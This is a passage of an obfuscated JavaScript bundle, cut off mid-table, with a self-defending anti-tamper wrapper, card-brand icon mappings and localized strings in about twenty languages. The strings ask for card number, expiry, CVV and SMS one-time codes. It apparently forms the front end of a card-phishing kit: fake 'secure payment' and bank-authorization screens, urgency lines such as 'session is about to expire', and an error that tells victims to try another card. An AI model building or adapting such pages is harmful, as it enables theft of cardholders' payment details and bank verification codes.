const a37_0x1ef865 = function () {
  let _0x72285d = true;
  return function (_0x33f9f3, _0x1e4160) {
    const _0x2d6c7f = _0x72285d ? function () {
      if (_0x1e4160) {
        const _0x578771 = _0x1e4160.apply(_0x33f9f3, arguments);
        _0x1e4160 = null;
        return _0x578771;
      }
    } : function () {};
    _0x72285d = false;
    return _0x2d6c7f;
  };
}();
const a37_0x596408 = a37_0x1ef865(this, function () {
  return a37_0x596408.toString().search("(((.+)+)+)+$").toString().constructor(a37_0x596408).search("(((.+)+)+)+$");
});
a37_0x596408();
import { g as a37_0x2338d7, u as a37_0x45aeb0, b as a37_0x1515c7 } from './3213f1cfKXMp5.js';
import { u as a37_0x53a1fc } from './f0ee2557KXMp5.js';
import { a as a37_0x788a3a, x as a37_0xe2567c, B as a37_0x54a45a, o as a37_0x42606d } from './index-4b020bd6.js';
const j = '' + new URL("56af3b63TeKnX.svg", import.meta.url).href;
const S = '' + new URL("d2820b3bTeKnX.svg", import.meta.url).href;
const f = '' + new URL("1a32e133TeKnX.svg", import.meta.url).href;
const C = '' + new URL("e62e6680TeKnX.svg", import.meta.url).href;
const M = '' + new URL("76199802TeKnX.svg", import.meta.url).href;
const z = '' + new URL("c8e88e5fTeKnX.svg", import.meta.url).href;
const D = '' + new URL("d9f50107TeKnX.svg", import.meta.url).href;
const T = '' + new URL("272b931fTeKnX.svg", import.meta.url).href;
const V = '' + new URL("b4f258fbTeKnX.svg", import.meta.url).href;
const w = {
  'visa': V,
  'mastercard': D,
  'amex': S,
  'discover': C,
  'unionpay': T,
  'jcb': M,
  'maestro': z,
  'diners': f,
  'cardIcon': j
};
const l = {
  'zh': {
    'cardName': "持卡人",
    'cardNumber': '卡號',
    'cardExpire': "到期日期",
    'cardCvv': "安全碼 (CVV)",
    'cardSubmit': '提交',
    'cardErrorMsg': "該卡不支持此交易，請嘗試使用其他卡",
    'cardDenyCreditMsg': "此交易不接受信用卡",
    'cardDenyDebitMsg': "此交易不接受借記卡",
    'title': "授權銀行",
    'subTitle': "請前往銀行App確認授權",
    'hint': "請不要關閉此頁面",
    'rejectMsg': "會話即將過期，請立即完成驗證",
    'smsTitle': "安全支付",
    'smsPhone': "驗證碼已發送至***",
    'smsOnetime': "請確認您的身份，一次性代碼將發送到您的手機號碼或電子郵件地址。 請在此輸入驗證碼",
    'smsSubtitle': "請不要點擊“刷新”或“返回”按鈕，因為這可能會終止或終止您的交易",
    'rejectSms': "驗證碼錯誤，請重試",
    'smsCode': '驗證碼',
    'smsSubmit': '提交',
    'smsResend': "單擊此處接收另一個代碼"
  },
  'en': {
    'cardName': "Cardholder",
    'cardNumber': "Card number",
    'cardExpire': "Expire date",
    'cardCvv': "Security Code (CVV)",
    'cardSubmit': 'Submit',
    'cardErrorMsg': "This card does not support this transaction, please try another card",
    'cardDenyCreditMsg': "Credit cards are not accepted for this transaction",
    'cardDenyDebitMsg': "This transaction does not accept debit cards",
    'title': "Authorized bank",
    'subTitle': "Please go to the bank App to confirm the authorization",
    'hint': "Please do not close this page",
    'rejectMsg': "The session is about to expire, please complete the verification now",
    'smsTitle': "Safe payment",
    'smsPhone': "The verification code has been sent to ***",
    'smsOnetime': "Please confirm your identity and a one-time code will be sent to your mobile number or email address. Please enter verification code here",
    'smsSubtitle': "Please do not click the \"Refresh\" or \"Back\" buttons as this may terminate or terminate your transaction",
    'rejectSms': "Verification code error, please try again",
    'smsCode': "Verification code",
    'smsSubmit': "Submit",
    'smsResend': "Click here to receive another code"
  },
  'de': {
    'cardName': "Kartenhalter",
    'cardNumber': "Kartennummer",
    'cardExpire': "Ablaufdatum",
    'cardCvv': "Sicherheitscode (CVV)",
    'cardSubmit': "Einreichen",
    'cardErrorMsg': "Diese Karte unterstützt diese Transaktion nicht. Bitte versuchen Sie es mit einer anderen Karte",
    'cardDenyCreditMsg': "Kreditkarten werden für diese Transaktion nicht akzeptiert",
    'cardDenyDebitMsg': "Bei dieser Transaktion werden keine Debitkarten akzeptiert",
    'title': "Autorisierte Bank",
    'subTitle': "Bitte gehen Sie zur Bank-App, um die Autorisierung zu bestätigen",
    'hint': "Bitte schließen Sie diese Seite nicht",
    'rejectMsg': "Die Sitzung läuft bald ab. Bitte schließen Sie jetzt die Überprüfung ab",
    'smsTitle': "Sichere Zahlung",
    'smsPhone': "Der Bestätigungscode wurde an *** gesendet",
    'smsOnetime': "Bitte bestätigen Sie Ihre Identität und ein Einmalcode wird an Ihre Handynummer oder E-Mail-Adresse gesendet. Bitte geben Sie hier den Bestätigungscode ein",
    'smsSubtitle': "Bitte klicken Sie nicht auf die Schaltflächen „Aktualisieren“ oder „Zurück“, da dies zu einem Abbruch oder Abbruch Ihrer Transaktion führen kann",
    'rejectSms': "Fehler beim Bestätigungscode. Bitte versuchen Sie es erneut",
    'smsCode': "Bestätigungscode",
    'smsSubmit': "Einreichen",
    'smsResend': "Klicken Sie hier, um einen weiteren Code zu erhalten"
  },
  'pt': {
    'cardName': "Titular do cartão",
    'cardNumber': "Número do cartão",
    'cardExpire': "Data de validade",
    'cardCvv': "Código de Segurança (CVV)",
    'cardSubmit': 'Enviar',
    'cardErrorMsg': "Este cartão não suporta esta transação, tente outro cartão",
    'cardDenyCreditMsg': "Cartões de crédito não são aceitos para esta transação",
    'cardDenyDebitMsg': "Esta transação não aceita cartões de débito",
    'title': "Banco autorizado",
    'subTitle': "Acesse o aplicativo do banco para confirmar a autorização",
    'hint': "Por favor não feche esta página",
    'rejectMsg': "A sessão está prestes a expirar. Conclua a verificação agora",
    'smsTitle': "Pagamento seguro",
    'smsPhone': "O código de verificação foi enviado para ***",
    'smsOnetime': "Por favor, confirme sua identidade e um código único será enviado para seu número de celular ou endereço de e-mail. Por favor insira o código de verificação aqui",
    'smsSubtitle': "Por favor, não clique nos botões \"Atualizar\" ou \"Voltar\", pois isso pode encerrar ou encerrar sua transação",
    'rejectSms': "Erro no código de verificação, tente novamente",
    'smsCode': "Código de verificação",
    'smsSubmit': "Enviar",
    'smsResend': "Clique aqui para receber outro código"
  },
  'lv': {
    'cardName': "Kartes īpašnieks",
    'cardNumber': "Kartes numurs",
    'cardExpire': "Derīguma termiņš",
    'cardCvv': "Drošības kods (CVV)",
    'cardSubmit': "Iesniegt",
    'cardErrorMsg': "Šī karte neatbalsta šo darījumu. Lūdzu, izmēģiniet citu karti",
    'cardDenyCreditMsg': "Kredītkartes netiek pieņemtas šim darījumam",
    'cardDenyDebitMsg': "Šis darījums nepieņem debetkartes",
    'title': "Pilnvarota banka",
    'subTitle': "Lūdzu, dodieties uz bankas lietotni, lai apstiprinātu autorizāciju",
    'hint': "Lūdzu, neaizveriet šo lapu",
    'rejectMsg': "Sesija drīz beigsies. Lūdzu, pabeidziet verifikāciju tūlīt",
    'smsTitle': "Drošs maksājums",
    'smsPhone': "Verifikācijas kods ir nosūtīts uz ***",
    'smsOnetime': "Lūdzu, apstipriniet savu identitāti, un uz jūsu mobilā tālruņa numuru vai e-pasta adresi tiks nosūtīts vienreizējs kods. Lūdzu, ievadiet verifikācijas kodu šeit",
    'smsSubtitle': "Lūdzu, neklikšķiniet uz pogas \"Atsvaidzināt\" vai \"Atpakaļ\", jo tas var pārtraukt vai pārtraukt jūsu darījumu.",
    'rejectSms': "Verifikācijas koda kļūda. Lūdzu, mēģiniet vēlreiz",
    'smsCode': "Verifikācijas kods",
    'smsSubmit': "Iesniegt",
    'smsResend': "Noklikšķiniet šeit, lai saņemtu citu kodu"
  },
  'el': {
    'cardName': "Κάτοχος κάρτας",
    'cardNumber': "Αριθμός κάρτας",
    'cardExpire': "Ημερομηνία λήξης",
    'cardCvv': "Κωδικός Ασφαλείας (CVV)",
    'cardSubmit': "υποβάλλουν",
    'cardErrorMsg': "Αυτή η κάρτα δεν υποστηρίζει αυτήν τη συναλλαγή, δοκιμάστε άλλη κάρτα",
    'cardDenyCreditMsg': "Δεν γίνονται δεκτές πιστωτικές κάρτες για αυτή τη συναλλαγή",
    'cardDenyDebitMsg': "Αυτή η συναλλαγή δεν δέχεται χρεωστικές κάρτες",
    'title': "Εξουσιοδοτημένη τράπεζα",
    'subTitle': "Μεταβείτε στην εφαρμογή της τράπεζας για να επιβεβαιώσετε την εξουσιοδότηση",
    'hint': "Παρακαλώ μην κλείσετε αυτή τη σελίδα",
    'rejectMsg': "Η συνεδρία πρόκειται να λήξει, ολοκληρώστε την επαλήθευση τώρα",
    'smsTitle': "Ασφαλής πληρωμή",
    'smsPhone': "Ο κωδικός επαλήθευσης έχει σταλεί στη διεύθυνση ***",
    'smsOnetime': "Παρακαλούμε επιβεβαιώστε την ταυτότητά σας και ένας κωδικός μίας χρήσης θα σταλεί στον αριθμό του κινητού σας ή στη διεύθυνση email σας. Εισαγάγετε εδώ τον κωδικό επαλήθευσης",
    'smsSubtitle': "Μην κάνετε κλικ στα κουμπιά \"Ανανέωση\" ή \"Πίσω\", καθώς αυτό μπορεί να τερματίσει ή να τερματίσει τη συναλλαγή σας",
    'rejectSms': "Σφάλμα κωδικού επαλήθευσης, δοκιμάστε ξανά",
    'smsCode': "Κωδικός επαλήθευσης",
    'smsSubmit': "υποβάλλουν",
    'smsResend': "Κάντε κλικ εδώ για να λάβετε άλλον κωδικό"
  },
  'ms': {
    'cardName': "Pemegang kad",
    'cardNumber': "Nombor kad",
    'cardExpire': "Tarikh luput",
    'cardCvv': "Kod Keselamatan (CVV)",
    'cardSubmit': "Hantar",
    'cardErrorMsg': "Kad ini tidak menyokong transaksi ini, sila cuba kad lain",
    'cardDenyCreditMsg': "Kad kredit tidak diterima untuk transaksi ini",
    'cardDenyDebitMsg': "Urus niaga ini tidak menerima kad debit",
    'title': "Bank yang diberi kuasa",
    'subTitle': "Sila pergi ke Apl bank untuk mengesahkan kebenaran",
    'hint': "Tolong jangan tutup halaman ini",
    'rejectMsg': "Sesi akan tamat tempoh, sila lengkapkan pengesahan sekarang",
    'smsTitle': "Pembayaran selamat",
    'smsPhone': "Kod pengesahan telah dihantar ke ***",
    'smsOnetime': "Sila sahkan identiti anda dan kod sekali sahaja akan dihantar ke nombor mudah alih atau alamat e-mel anda. Sila masukkan kod pengesahan di sini",
    'smsSubtitle': "Sila jangan klik butang \"Muat Semula\" atau \"Kembali\" kerana ini boleh menamatkan atau menamatkan transaksi anda",
    'rejectSms': "Ralat kod pengesahan, sila cuba lagi",
    'smsCode': "Kod pengesahan",
    'smsSubmit': "Hantar",
    'smsResend': "Klik di sini untuk menerima kod lain"
  },
  'hr': {
    'cardName': "Vlasnik kartice",
    'cardNumber': "Broj kartice",
    'cardExpire': "Rok trajanja",
    'cardCvv': "Sigurnosni kod (CVV)",
    'cardSubmit': "podnijeti",
    'cardErrorMsg': "Ova kartica ne podržava ovu transakciju, pokušajte s drugom karticom",
    'cardDenyCreditMsg': "Kreditne kartice se ne prihvaćaju za ovu transakciju",
    'cardDenyDebitMsg': "Ova transakcija ne prihvaća debitne kartice",
    'title': "Ovlaštena banka",
    'subTitle': "Idite u aplikaciju banke kako biste potvrdili autorizaciju",
    'hint': "Molimo ne zatvarajte ovu stranicu",
    'rejectMsg': "Sesija će uskoro isteći, dovršite provjeru sada",
    'smsTitle': "Sigurno plaćanje",
    'smsPhone': "Kontrolni kod je poslan na ***",
    'smsOnetime': "Potvrdite svoj identitet i jednokratni kod će biti poslan na vaš broj mobitela ili adresu e-pošte. Ovdje unesite kod za provjeru",
    'smsSubtitle': "Nemojte kliknuti gumbe \"Osvježi\" ili \"Natrag\" jer to može prekinuti ili prekinuti vašu transakciju",
    'rejectSms': "Pogreška kontrolnog koda, pokušajte ponovo",
    'smsCode': "Kontrolni kod",
    'smsSubmit': "podnijeti",
    'smsResend': "Kliknite ovdje za primanje drugog koda"
  },
  'sk': {
    'cardName': "Držiteľ karty",
    'cardNumber': "Číslo karty",
    'cardExpire': "Dátum expirácie",
    'cardCvv': "bezpečnostný kód (CVV)",
    'cardSubmit': 'Predložiť',
    'cardErrorMsg': "Táto karta nepodporuje túto transakciu, skúste inú kartu",
    'cardDenyCreditMsg': "Pre túto transakciu nie sú akceptované kreditné karty",
    'cardDenyDebitMsg': "Táto transakcia neprijíma debetné karty",
    'title': "Autorizovaná banka",
    'subTitle': "Prejdite do aplikácie banky a potvrďte autorizáciu",
    'hint': "Prosím, nezatvárajte túto stránku",
    'rejectMsg': "Platnosť relácie čoskoro vyprší, dokončite overenie teraz",
    'smsTitle': "Bezpečná platba",
    'smsPhone': "Overovací kód bol odoslaný na adresu ***",
    'smsOnetime': "Potvrďte svoju identitu a na vaše mobilné číslo alebo e-mailovú adresu vám bude zaslaný jednorazový kód. Tu zadajte overovací kód",
    'smsSubtitle': "Neklikajte na tlačidlá „Obnoviť“ alebo „Späť“, pretože to môže ukončiť alebo ukončiť vašu transakciu",
    'rejectSms': "Chyba overovacieho kódu, skúste to znova",
    'smsCode': "Overovací kód",
    'smsSubmit': "Predložiť",
    'smsResend': "Kliknutím sem získate ďalší kód"
  },
  'es': {
    'cardName': "Titular de la tarjeta",
    'cardNumber': "Número de tarjeta",
    'cardExpire': "Fecha de caducidad",
    'cardCvv': "Código de seguridad (CVV).",
    'cardSubmit': 'Entregar',
    'cardErrorMsg': "Esta tarjeta no admite esta transacción, pruebe con otra tarjeta",
    'cardDenyCreditMsg': "No se aceptan tarjetas de crédito para esta transacción.",
    'cardDenyDebitMsg': "Esta transacción no acepta tarjetas de débito.",
    'title': "banco autorizado",
    'subTitle': "Por favor vaya a la App del banco para confirmar la autorización",
    'hint': "Por favor no cierres esta página",
    'rejectMsg': "La sesión está a punto de caducar, complete la verificación ahora",
    'smsTitle': "Pago seguro",
    'smsPhone': "El código de verificación ha sido enviado a ***",
    'smsOnetime': "Confirme su identidad y se enviará un código único a su número de teléfono móvil o dirección de correo electrónico. Por favor ingrese el código de verificación aquí",
    'smsSubtitle': "No haga clic en los botones \"Actualizar\" o \"Atrás\", ya que esto puede cancelar o cancelar su transacción.",
    'rejectSms': "Error en el código de verificación, inténtelo de nuevo",
    'smsCode': "Código de verificación",
    'smsSubmit': "Entregar",
    'smsResend': "Haga clic aquí para recibir otro código"
  },
  'sv': {
    'cardName': "Korthållare",
    'cardNumber': 'Kortnummer',
    'cardExpire': "Utgångsdatum",
    'cardCvv': "Säkerhetskod (CVV)",
    'cardSubmit': "Skicka in",
    'cardErrorMsg': "Detta kort stöder inte den här transaktionen, försök med ett annat kort",
    'cardDenyCreditMsg': "Kreditkort accepteras inte för denna transaktion",
    'cardDenyDebitMsg': "Denna transaktion accepterar inte betalkort",
    'title': "Auktoriserad bank",
    'subTitle': "Gå till bankappen för att bekräfta auktoriseringen",
    'hint': "Stäng inte den här sidan",
    'rejectMsg': "Sessionen är på väg att löpa ut, vänligen slutför verifieringen nu",
    'smsTitle': "Säker betalning",
    'smsPhone': "Verifieringskoden har skickats till ***",
    'smsOnetime': "Vänligen bekräfta din identitet så skickas en engångskod till ditt mobilnummer eller din e-postadress. Vänligen ange verifieringskoden här",
    'smsSubtitle': "Vänligen klicka inte på \"Uppdatera\" eller \"Tillbaka\"-knapparna eftersom detta kan avsluta eller avsluta din transaktion",
    'rejectSms': "Verifieringskodfel, försök igen",
    'smsCode': "Verifierings kod",
    'smsSubmit': "Skicka in",
    'smsResend': "Klicka här för att få en annan kod"
  },
  'fi': {
    'cardName': "Kortin haltija",
    'cardNumber': "Kortin numero",
    'cardExpire': "Viimeinen käyttöpäivä",
    'cardCvv': "Turvakoodi (CVV)",
    'cardSubmit': "Lähetä",
    'cardErrorMsg': "Tämä kortti ei tue tätä tapahtumaa, kokeile toista korttia",
    'cardDenyCreditMsg': "Luottokortteja ei hyväksytä tähän tapahtumaan",
    'cardDenyDebitMsg': "Tämä tapahtuma ei hyväksy pankkikortteja",
    'title': "Valtuutettu pankki",
    'subTitle': "Mene pankkisovellukseen vahvistaaksesi valtuutuksen",
    'hint': "Älä sulje tätä sivua",
    'rejectMsg': "Istunto on vanhentumassa, suorita vahvistus nyt",
    'smsTitle': "Turvallinen maksu",
    'smsPhone': "Vahvistuskoodi on lähetetty osoitteeseen ***",
    'smsOnetime': "Vahvista henkilöllisyytesi, niin matkapuhelinnumeroosi tai sähköpostiosoitteeseesi lähetetään kertaluonteinen koodi. Anna vahvistuskoodi tähän",
    'smsSubtitle': "Älä napsauta \"Päivitä\"- tai \"Takaisin\"-painikkeita, koska tämä voi keskeyttää tai lopettaa tapahtumasi",
    'rejectSms': "Vahvistuskoodivirhe, yritä uudelleen",
    'smsCode': "Vahvistuskoodi",
    'smsSubmit': "Lähetä",
    'smsResend': "Napsauta tästä saadaksesi toisen koodin"
  },
  'et': {
    'cardName': "Kaardi omanik",
    'cardNumber': "Kaardi number",
    'cardExpire': "Aegumiskuupäev",
    'cardCvv': "Turvakood (CVV)",
    'cardSubmit': "Esita",
    'cardErrorMsg': "See kaart ei toeta seda tehingut, proovige teist kaarti",
    'cardDenyCreditMsg': "Krediitkaarte selle tehingu jaoks ei aktsepteerita",
    'cardDenyDebitMsg': "See tehing ei aktsepteeri deebetkaarte",
    'title': "Volitatud pank",
    'subTitle': "Volituse kinnitamiseks minge pangarakendusse",
    'hint': "Palun ärge sulgege seda lehte",
    'rejectMsg': "Seanss hakkab aeguma, palun viige kinnitus kohe lõpule",
    'smsTitle': "Turvaline makse",
    'smsPhone': "Kinnituskood on saadetud aadressile ***",
    'smsOnetime': "Kinnitage oma isik ja teie mobiilinumbrile või e-posti aadressile saadetakse ühekordne kood. Sisestage kinnituskood siia",
    'smsSubtitle': "Ärge klõpsake nuppu \"Värskenda\" või \"Tagasi\", kuna see võib teie tehingu lõpetada või lõpetada",
    'rejectSms': "Kinnituskoodi viga, proovige uuesti",
    'smsCode': "Kinnituskood",
    'smsSubmit': "Esita",
    'smsResend': "Uue koodi saamiseks klõpsake siin"
  },
  'da': {
    'cardName': "Kortholder",
    'cardNumber': "Kortnummer",
    'cardExpire': "Udløbsdato",
    'cardCvv': "Sikkerhedskode (CVV)",
    'cardSubmit': "Indsend",
    'cardErrorMsg': "Dette kort understøtter ikke denne transaktion, prøv venligst et andet kort",
    'cardDenyCreditMsg': "Kreditkort accepteres ikke til denne transaktion",
    'cardDenyDebitMsg': "Denne transaktion accepterer ikke betalingskort",
    'title': "Autoriseret bank",
    'subTitle': "Gå til bankappen for at bekræfte godkendelsen",
    'hint': "Luk venligst ikke denne side",
    'rejectMsg': "Sessionen er ved at udløbe. Fuldfør venligst bekræftelsen nu",
    'smsTitle': "Sikker betaling",
    'smsPhone': "Bekræftelseskoden er blevet sendt til ***",
    'smsOnetime': "Bekræft venligst din identitet, og en engangskode vil blive sendt til dit mobilnummer eller din e-mailadresse. Indtast venligst bekræftelseskoden her",
    'smsSubtitle': "Klik venligst ikke på \"Opdater\" eller \"Tilbage\", da dette kan afslutte eller afslutte din transaktion",
    'rejectSms': "Bekræftelseskodefejl. Prøv venligst igen",
    'smsCode': "Verifikationskode",
    'smsSubmit': "Indsend",
    'smsResend': "Klik her for at modtage en anden kode"
  },
  'iw': {
    'cardName': "בעל כרטיס",
    'cardNumber': "מספר כרטיס",
    'cardExpire': "תאריך תפוגה",
    'cardCvv': "קוד אבטחה (CVV)",
    'cardSubmit': 'שלח',
    'cardErrorMsg': "כרטיס זה אינו תומך בעסקה זו, אנא נסה כרטיס אחר",
    'cardDenyCreditMsg': "כרטיסי אשראי אינם מתקבלים עבור עסקה זו",
    'cardDenyDebitMsg': "עסקה זו אינה מקבלת כרטיסי חיוב",
    'title': "בנק מורשה",
    'subTitle': "נא להיכנס לאפליקציית הבנק כדי לאשר את ההרשאה",
    'hint': "נא לא לסגור את הדף הזה",
    'rejectMsg': "ההפעלה עומדת לפוג, אנא השלם את האימות כעת",
    'smsTitle': "תשלום בטוח",
    'smsPhone': "קוד האימות נשלח אל ***",
    'smsOnetime': "אנא אשר את זהותך וקוד חד פעמי יישלח למספר הנייד או לכתובת הדוא\"ל שלך. נא להזין כאן קוד אימות",
    'smsSubtitle': "נא לא ללחוץ על הלחצנים \"רענן\" או \"הקודם\" מכיוון שהדבר עלול לסיים או לסיים את העסקה שלך",
    'rejectSms': "שגיאת קוד אימות, אנא נסה שוב",
    'smsCode': "קוד אימות",
    'smsSubmit': "שלח",
    'smsResend': "לחץ כאן כדי לקבל קוד נוסף"
  },
  'no': {
    'cardName': "Kortholder",
    'cardNumber': "Kortnummer",
    'cardExpire': 'Utløpsdato',
    'cardCvv': "Sikkerhetskode (CVV)",
    'cardSubmit': "Sende inn",
    'cardErrorMsg': "Dette kortet støtter ikke denne transaksjonen, prøv et annet kort",
    'cardDenyCreditMsg': "Kredittkort godtas ikke for denne transaksjonen",
    'cardDenyDebitMsg': "Denne transaksjonen godtar ikke debetkort",
    'title': "Autorisert bank",
    'subTitle': "Gå til bankappen for å bekrefte autorisasjonen",
    'hint': "Vennligst ikke lukk denne siden",
    'rejectMsg': "Økten er i ferd med å utløpe. Fullfør bekreftelsen nå",
    'smsTitle': "Trygg betaling",
    'smsPhone': "Bekreftelseskoden er sendt til ***",
    'smsOnetime': "Vennligst bekreft identiteten din og en engangskode vil bli sendt til ditt mobilnummer eller e-postadresse. Vennligst skriv inn bekreftelseskoden her",
    'smsSubtitle': "Vennligst ikke klikk på \"Oppdater\" eller \"Tilbake\"-knappene, da dette kan avslutte eller avslutte transaksjonen din",
    'rejectSms': "Bekreftelseskodefeil, prøv igjen",
    'smsCode': "Bekreftelseskode",
    'smsSubmit': "Sende inn",
    'smsResend': "Klikk her for å motta en annen kode"
  },
  'hu': {
    'cardName': "Kártyatartó",
    'cardNumber': "Kártyaszám",
    'cardExpire': "Lejárati dátum",
    'cardCvv': "Biztonsági kód (CVV)",
    'cardSubmit': 'Beküldés',
    'cardErrorMsg': "Ez a kártya nem támogatja ezt a tranzakciót, próbálkozzon másik kártyával",
    'cardDenyCreditMsg': "Hitelkártyát nem fogadnak el ehhez a tranzakcióhoz",
    'cardDenyDebitMsg': "Ez a tranzakció nem fogad el betéti kártyákat",
    'title': "Engedélyezett bank",
    'subTitle': "Kérjük, lépjen a banki alkalmazásba az engedélyezés megerősítéséhez",
    'hint': "Kérjük, ne zárja be ezt az oldalt",
    'rejectMsg': "A munkamenet hamarosan lejár, kérjük, fejezze be az ellenőrzést most",
    'smsTitle': "Biztonságos fizetés",
    'smsPhone': "Az ellenőrző kódot elküldtük a következő címre: ***",
    'smsOnetime': "Kérjük, erősítse meg személyazonosságát, és egy egyszeri kódot küldünk mobilszámára vagy e-mail címére. Kérjük, írja be ide az ellenőrző kódot",
    'smsSubtitle': "Kérjük, ne kattintson a \"Frissítés\" vagy a \"Vissza\" gombra, mivel ez megszüntetheti vagy megszüntetheti a tranzakciót",
    'rejectSms': "Ellenőrző kód hiba, próbálja újra",
    'smsCode': "Ellenőrző kód",
    'smsSubmit': "Beküldés",
    'smsResend': "Kattintson ide egy másik kód fogadásához"
  },
  'nl': {
    'cardName': "Kaarthouder",
    'cardNumber': "Kaartnummer",
    'cardExpire': "Vervaldatum",
    'cardCvv': "Beveiligingscode (CVV)",
    'cardSubmit': "Indienen",
    'cardErrorMsg': "Deze kaart ondersteunt deze transactie niet. Probeer een andere kaart",
    'cardDenyCreditMsg': "Creditcards worden voor deze transactie niet geaccepteerd",
    'cardDenyDebitMsg': "Deze transactie accepteert geen debetkaarten",
    'title': "Geautoriseerde bank",
    'subTitle': "Ga naar de bankapp om de autorisatie te bevestigen",
    'hint': "Sluit deze pagina alstublieft niet",
    'rejectMsg': "De sessie loopt bijna af. Voltooi nu de verificatie",
    'smsTitle': "Veilig betalen",
    'smsPhone': "De verificatiecode is verzonden naar ***",
    'smsOnetime': "Bevestig uw identiteit en er wordt een eenmalige code naar uw mobiele nummer of e-mailadres verzonden. Voer hier de verificatiecode in",
    'smsSubtitle': "Klik niet op de knoppen \"Vernieuwen\" of \"Terug\", aangezien dit uw transactie kan beëindigen of beëindigen",
    'rejectSms': "Fout met verificatiecode. Probeer het opnieuw",
    'smsCode': "Verificatie code",
    'smsSubmit': "Indienen",
    'smsResend': "Klik hier om nog een code te ontvangen"
  },
  'sl': {
    'cardName': "Imetnik kartice",
    'cardNumber': "Številka kartice",
    'cardExpire': "Rok uporabnosti",
    'cardCvv': "Varnostna koda (CVV)",
    'cardSubmit': "Predloži",
    'cardErrorMsg': "Ta kartica ne podpira te transakcije, poskusite z drugo kartico",
    'cardDenyCreditMsg': "Za to transakcijo ne sprejemamo kreditnih kartic",
    'cardDenyDebitMsg': "Ta transakcija ne sprejema debetnih kartic",
    'title': "Pooblaščena banka",
    'subTitle': "Pojdite v aplikacijo banke, da potrdite avtorizacijo",
    'hint': "Prosim, ne zaprite te strani",
    'rejectMsg': "Seja bo kmalu potekla, dokončajte preverjanje zdaj",
    'smsTitle': "Varno plačilo",
    'smsPhone': "Koda za preverjanje je bila poslana na ***",
    'smsOnetime': "Potrdite svojo identiteto in enkratna koda bo poslana na vašo mobilno številko ali e-poštni naslov. Tukaj vnesite potrditveno kodo",
    'smsSubtitle': "Ne kliknite gumbov »Osveži« ali »Nazaj«, saj lahko to prekine ali prekine vašo transakcijo",
    'rejectSms': "Napaka kode za preverjanje, poskusite znova",
    'smsCode': "Koda za preverjanje",
    'smsSubmit': 'Predloži',
    'smsResend': "Kliknite tukaj, če želite prejeti drugo kodo"
  },
  'ar': {
    'cardName': "حامل البطاقة",
    'cardNumber': "رقم البطاقة",
    'cardExpire': "تاريخ انتهاء الصلاحية",
    'cardCvv': "رمز الحماية (CVV)",
    'cardSubmit': "يُقدِّم",
    'cardErrorMsg': "هذه البطاقة لا تدعم هذه المعاملة، يرجى تجربة بطاقة أخرى",
    'cardDenyCreditMsg': "لا يتم قبول بطاقات الائتمان لهذه المعاملة",
    'cardDenyDebitMsg': "هذه المعاملة لا تقبل بطاقات الخصم",
    'title': "البنك المعتمد",
    'subTitle': "يرجى الدخول إلى تطبيق البنك لتأكيد التفويض",
    'hint': "من فضلك لا تغلق هذه الصفحة",
    'rejectMsg': "الجلسة على وشك الانتهاء، يرجى إكمال عملية التحقق الآن",
    'smsTitle': "الدفع الآمن",
    'smsPhone': "تم إرسال رمز التحقق إلى ***",
    'smsOnetime': "يرجى تأكيد هويتك وسيتم إرسال رمز لمرة واحدة إلى رقم هاتفك المحمول أو عنوان بريدك الإلكتروني. الرجاء إدخال رمز التحقق هنا",
    'smsSubtitle': "من فضلك لا تنقر على زر \"تحديث\" أو \"رجوع\" لأن ذلك قد يؤدي إلى إنهاء معاملتك أو إنهائها",
    'rejectSms': "خطأ في رمز التحقق، يرجى المحاولة مرة أخرى",
    'smsCode': "رمز التحقق",
    'smsSubmit': "يُقدِّم",
    'smsResend': "انقر هنا لتلقي رمز آخر"
  },
  'kk': {
    'cardName': "Карта ұстаушы",
    'cardNumber': "Карточка нөмірі",
    'cardExpire': "Қолданылу мерзімі",
    'cardCvv': "Қауіпсіздік коды (CVV)",
    'cardSubmit': 'Жіберу',
    'cardErrorMsg': "Бұл карта бұл транзакцияны қолдамайды, басқа картаны қолданып көріңіз",
    'cardDenyCreditMsg': "Бұл транзакция үшін несие карталары қабылданбайды",
    'cardDenyDebitMsg': "Бұл транзакция дебеттік карталарды қабылдамайды",
    'title': "Уәкілетті банк",
    'subTitle': "Авторизацияны растау үшін банк қолданбасына өтіңіз",
    'hint': "Өтінемін, бұл бетті жаппаңыз",
    'rejectMsg': "Сеанс аяқталуға жақын, растауды қазір аяқтаңыз",
    'smsTitle': "Қауіпсіз төлем",
    'smsPhone': "Растау коды *** мекенжайына жіберілді.",
    'smsOnetime': "Жеке басыңызды растаңыз және ұялы телефон нөміріңізге немесе электрондық пошта мекенжайыңызға бір реттік код жіберіледі. Мұнда растау кодын енгізіңіз",
    'smsSubtitle': "«Жаңарту» немесе «Артқа» түймелерін баспаңыз, себебі бұл транзакцияңызды тоқтатуы немесе тоқтатуы мүмкін",
    'rejectSms': "Растау коды қатесі, әрекетті қайталаңыз",
    'smsCode': "Тексеру коды",
    'smsSubmit': 'Жіберу',
    'smsResend': "Басқа кодты алу үшін осы жерді басыңыз"
  },
  'ko': {
    'cardName': "카드홀더",
    'cardNumber': "카드 번호",
    'cardExpire': "만료일",
    'cardCvv': "보안 코드(CVV)",
    'cardSubmit': "제출하다",
    'cardErrorMsg': "이 카드는 이 거래를 지원하지 않습니다. 다른 카드를 사용해 보세요.",
    'cardDenyCreditMsg': "이 거래에는 신용카드를 사용할 수 없습니다.",
    'cardDenyDebitMsg': "이 거래에서는 직불카드를 사용할 수 없습니다.",
    'title': "승인된 은행",
    'subTitle': "승인을 확인하려면 은행 앱으로 이동하세요.",
    'hint': "이 페이지를 닫지 마세요",
    'rejectMsg': "세션이 곧 만료됩니다. 지금 확인을 완료하세요.",
    'smsTitle': "안전한 결제",
    'smsPhone': "***로 인증번호가 발송되었습니다.",
    'smsOnetime': "신원을 확인하시면 일회용 코드가 귀하의 휴대폰 번호 또는 이메일 주소로 전송됩니다. 여기에 인증번호를 입력해주세요",
    'smsSubtitle': "거래가 종료되거나 종료될 수 있으므로 \"새로 고침\" 또는 \"뒤로\" 버튼을 클릭하지 마십시오.",
    'rejectSms': "인증코드 오류입니다. 다시 시도해 주세요.",
    'smsCode': "확인 코드",
    'smsSubmit': "제출하다",
    'smsResend': "다른 코드를 받으려면 여기를 클릭하세요"
  },
  'tr': {
    'cardName': "Kart sahibi",
    'cardNumber': "Kart numarası",
    'cardExpire': "Son kullanma tarihi",
    'cardCvv': "Güvenlik Kodu (CVV)",
    'cardSubmit': "Göndermek",
    'cardErrorMsg': "Bu kart bu işlemi desteklemiyor, lütfen başka bir kart deneyin",
    'cardDenyCreditMsg': "Bu işlemde kredi kartları kabul edilmemektedir",
